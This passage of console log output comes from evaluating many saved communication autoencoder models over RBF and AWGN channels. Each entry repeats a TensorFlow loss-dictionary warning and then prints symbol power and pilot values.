0.538443]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317022124.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.156111 Model: 1.156111 1.0578106299020127 1.0331982937070245 Pilots : [0.53761301 0.53761301]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317022524.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1538832 Model: 1.1538832 1.091118898340983 0.9692095875097516 Pilots : [0.53709478 0.53709478]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317022925.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1516418 Model: 1.1516418 1.0831261978316833 0.9816559792130407 Pilots : [0.53657289 0.53657289]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317023326.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1907737 Model: 1.1907737 1.1054304561989556 0.9744653287941614 Pilots : [0.5456129 0.5456129]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317023730.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1712675 Model: 1.1712675 1.087475579728185 0.9904146820731409 Pilots : [0.54112557 0.54112557]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317024138.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1653798 Model: 1.1653798 1.062699974850494 1.0319202417640625 Pilots : [0.53976378 0.53976378]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317024538.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1772053 Model: 1.1772053 1.0561190915125314 1.0554226999590566 Pilots : [0.54249547 0.54249547]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317024940.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1752532 Model: 1.1752532 1.0521543452065036 1.061628377506791 Pilots : [0.54204547 0.54204547]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317025341.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.174046 Model: 1.174046 1.1000714655080306 0.9701599190819084 Pilots : [0.54176703 0.54176703]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317025742.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1553016 Model: 1.1553016 1.080272563615729 0.9899851303702465 Pilots : [0.53742478 0.53742478]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317030147.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1513133 Model: 1.1513133 1.0494034513921924 1.0454627105973253 Pilots : [0.53649634 0.53649634]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317030548.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.173472 Model: 1.173472 1.0683621930503706 1.028100870704393 Pilots : [0.54163457 0.54163457]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317030950.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1672547 Model: 1.1672547 1.061902549891371 1.0351333452122415 Pilots : [0.54019781 0.54019781]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317031350.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1504321 Model: 1.1504321 1.0320034979729145 1.080186278500078 Pilots : [0.53629099 0.53629099]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317031749.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1469859 Model: 1.1469859 1.0771358874095354 0.9885919809663549 Pilots : [0.53548714 0.53548714]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317032150.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.162632 Model: 1.162632 1.0788718140495486 0.9988552891864192 Pilots : [0.53912707 0.53912707]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317032557.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1624156 Model: 1.1624156 1.0809385952114314 0.9948540931202134 Pilots : [0.5390769 0.5390769]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317032957.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1588349 Model: 1.1588349 1.0747052241323238 1.0033278306034192 Pilots : [0.53824598 0.53824598]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317033359.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.210472 Model: 1.210472 1.112927179923234 0.9772850289223064 Pilots : [0.55010726 0.55010726]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317033803.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1715236 Model: 1.1715236 1.1138849353678562 0.9442138580261565 Pilots : [0.54118471 0.54118471]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317034204.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1703916 Model: 1.1703916 1.0576406567137424 1.0462968235736765 Pilots : [0.54092318 0.54092318]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317034605.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1463363 Model: 1.1463363 1.0736301863372881 0.994495046179444 Pilots : [0.53533548 0.53533548]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317035004.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1613793 Model: 1.1613793 1.083182898824969 0.989852548149301 Pilots : [0.53883656 0.53883656]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317035402.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.139956 Model: 1.139956 1.0650731524990094 1.004914731626022 Pilots : [0.53384361 0.53384361]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317035801.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1854372 Model: 1.1854372 1.0888828046586914 0.9998072308107095 Pilots : [0.54438892 0.54438892]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317040203.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1596963 Model: 1.1596963 1.082259379307074 0.9901057215496385 Pilots : [0.53844599 0.53844599]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317040613.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1837821 Model: 1.1837821 1.088257789222352 0.9995584624580213 Pilots : [0.54400875 0.54400875]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317041010.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1831379 Model: 1.1831379 1.0929391176710543 0.9904747847085498 Pilots : [0.54386071 0.54386071]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317041414.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1676059 Model: 1.1676059 1.0681805132386637 1.023309416374065 Pilots : [0.54027907 0.54027907]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317041816.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1979406 Model: 1.1979406 1.0910716725825373 1.0063028877610114 Pilots : [0.54725236 0.54725236]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317042217.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1763849 Model: 1.1763849 1.063452710498282 1.0401909856127562 Pilots : [0.5423064 0.5423064]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317042618.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1452051 Model: 1.1452051 1.076943436876168 0.9874099535319494 Pilots : [0.53507129 0.53507129]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317043014.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1605351 Model: 1.1605351 1.0035368590614504 1.1523691471870963 Pilots : [0.53864067 0.53864067]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317043418.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1643398 Model: 1.1643398 1.08064127081643 0.997049308097721 Pilots : [0.53952289 0.53952289]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317043820.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1745979 Model: 1.1745979 1.0659611321766984 1.0337284433471154 Pilots : [0.54189433 0.54189433]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317044226.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1379267 Model: 1.1379267 1.0250255746247448 1.083040966445428 Pilots : [0.53336824 0.53336824]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317044622.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1696566 Model: 1.1696566 1.0863560127478518 0.9910921667486803 Pilots : [0.54075333 0.54075333]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317045021.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1647913 Model: 1.1647913 1.062277506555238 1.0322197494429508 Pilots : [0.5396275 0.5396275]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317045426.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1760361 Model: 1.1760361 1.084708306132996 0.9995274573674131 Pilots : [0.542226 0.542226]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317045827.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1677775 Model: 1.1677775 1.074975663998246 1.0105617416727295 Pilots : [0.54031878 0.54031878]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317050233.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1367822 Model: 1.1367822 1.05505800124677 1.0212323935218057 Pilots : [0.53309994 0.53309994]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317050633.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1474085 Model: 1.1474085 1.0505399566639153 1.039663762543299 Pilots : [0.53558577 0.53558577]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317051037.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1792362 Model: 1.1792362 1.0839090897131316 1.0037257740584922 Pilots : [0.54296321 0.54296321]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317051438.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1752932 Model: 1.1752932 1.088797356327939 0.991407296031349 Pilots : [0.5420547 0.5420547]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317051840.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1697028 Model: 1.1697028 1.0836328161604045 0.9961189927082291 Pilots : [0.54076399 0.54076399]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317052244.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1636847 Model: 1.1636847 1.1002981135850711 0.9612018481108628 Pilots : [0.5393711 0.5393711]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317052645.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.167018 Model: 1.167018 1.0787170179976897 1.0029112774844033 Pilots : [0.54014305 0.54014305]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317053047.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1626791 Model: 1.1626791 1.083033113982325 0.9912344466786143 Pilots : [0.53913799 0.53913799]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317053449.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1688972 Model: 1.1688972 1.055781823511023 1.0486436678843991 Pilots : [0.54057774 0.54057774]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317053855.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1703337 Model: 1.1703337 1.0566474964137957 1.0482128274613207 Pilots : [0.54090982 0.54090982]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317054257.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1366607 Model: 1.1366607 1.0618895625256586 1.0080269388760756 Pilots : [0.53307145 0.53307145]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317054701.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1778113 Model: 1.1778113 1.0942763233925508 0.9836071987483131 Pilots : [0.54263507 0.54263507]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317055100.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1782321 Model: 1.1782321 1.0614497435679215 1.0457598598743707 Pilots : [0.542732 0.542732]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317055458.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1496513 Model: 1.1496513 1.0761807387622728 0.992648980390986 Pilots : [0.53610896 0.53610896]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317055900.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.163065 Model: 1.163065 1.0617536585775633 1.03170714508535 Pilots : [0.53922745 0.53922745]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317060301.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1726172 Model: 1.1726172 1.0980952956881382 0.9724699653171984 Pilots : [0.54143725 0.54143725]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317060703.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1822586 Model: 1.1822586 1.1033311011257272 0.9711823100991451 Pilots : [0.54365858 0.54365858]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317021443.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6725037 Model: 2.6725037 1.5762498469948392 1.0756431154120016 Pilots : [0.8173897 0.8173897]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317021850.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6869988 Model: 2.6869988 1.5562623694821387 1.1094349598609794 Pilots : [0.81960339 0.81960339]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317022258.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6530776 Model: 2.6530776 1.5118006796119594 1.1608093051459671 Pilots : [0.81441353 0.81441353]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317022705.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6773703 Model: 2.6773703 1.5056533062694542 1.1810233353762603 Pilots : [0.81813359 0.81813359]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317023113.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6212823 Model: 2.6212823 1.5370342189738178 1.1095496195736805 Pilots : [0.80951874 0.80951874]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317023515.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6623464 Model: 2.6623464 1.542655494945882 1.1187335289056288 Pilots : [0.8158349 0.8158349]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317023924.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6199603 Model: 2.6199603 1.5529099582397894 1.0864310321071649 Pilots : [0.80931457 0.80931457]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317024330.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6675086 Model: 2.6675086 1.5421618168988538 1.1216204953736577 Pilots : [0.81662547 0.81662547]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317024735.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.5915399 Model: 2.5915399 1.5341656268463928 1.1010661130616644 Pilots : [0.80491302 0.80491302]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317025139.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6474175 Model: 2.6474175 1.5268733194993593 1.1355765878106259 Pilots : [0.81354434 0.81354434]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317025542.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6135168 Model: 2.6135168 1.5552340468983181 1.080522431064648 Pilots : [0.80831875 0.80831875]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317025952.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6797156 Model: 2.6797156 1.547675116693013 1.1187398540299205 Pilots : [0.81849185 0.81849185]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317030404.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6729019 Model: 2.6729019 1.498007609780257 1.1911185151886239 Pilots : [0.81745059 0.81745059]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317030812.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6572852 Model: 2.6572852 1.5454165050624444 1.1126205536553069 Pilots : [0.81505908 0.81505908]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317031221.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6547453 Model: 2.6547453 1.5363352817737106 1.1247366804829317 Pilots : [0.81466946 0.81466946]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317031629.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6736782 Model: 2.6736782 1.5325136022667443 1.13841458892891 Pilots : [0.81756929 0.81756929]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317032038.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.663229 Model: 2.663229 1.5093089260662806 1.1691015287896738 Pilots : [0.81597013 0.81597013]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317032447.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6578987 Model: 2.6578987 1.5542545303823707 1.1002569867544505 Pilots : [0.81515316 0.81515316]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317032856.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6806347 Model: 2.6806347 1.5311833449607148 1.1433606673944243 Pilots : [0.8186322 0.8186322]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317033300.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.630163 Model: 2.630163 1.5111425315356832 1.1517860077490514 Pilots : [0.81088886 0.81088886]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317033706.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.625495 Model: 2.625495 1.5111607659589283 1.1497140783290376 Pilots : [0.81016896 0.81016896]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317034115.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6563485 Model: 2.6563485 1.5573358730355908 1.095268181143637 Pilots : [0.8149154 0.8149154]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317034516.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.629759 Model: 2.629759 1.521327347999231 1.136241421625432 Pilots : [0.8108266 0.8108266]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317034925.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6526892 Model: 2.6526892 1.5297555402486511 1.1335542323207906 Pilots : [0.81435392 